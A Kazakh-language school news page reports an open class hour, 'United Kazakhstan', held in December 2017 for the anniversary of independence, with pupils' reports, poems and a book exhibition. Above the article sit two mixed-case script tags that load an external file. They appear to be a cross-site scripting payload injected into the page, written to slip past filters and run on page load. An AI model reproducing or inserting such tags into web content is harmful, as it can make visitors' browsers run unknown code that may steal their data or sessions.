<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

08.12.2017

Біртұтас Қазақстан

2017 жылғы 8 желтоқсан  күні  Каменская орта мектебінде 6 сынып жетекшісі  Қ.Құсайынованың ұйымдастыруымен Тәуелсіздіктің 26 жылдығына орай «Біртұтас Қазақстан» атты  ашық сынып сағатты өтті. Сабақ барысында 6 сынып оқушылары баяндама оқып, Елбасына, еліне, Отанына деген  керемет сезімдерін өлең жолдарымен  тамаша жеткізе білді.  Сурет көрінісі өтті, кітап көрмесі ұсынылды.

Сабақтың басты мақсаты - болашақ ұрпақтың рухани тұлғалық және адамгершілік құндылықтарын дамыту. Отанын сүюге, ел тарихын білуге, еліміздің мемлекеттік рәміздерін қастерлеуге, отанымыздың байлығын қорғауға, елімізді өркендетуге білімді ұрпақ болуға тәрбиелеу болып табылды.

Просмотров: 952


Пікір қосу



Деректерді қолтаңбаға қосу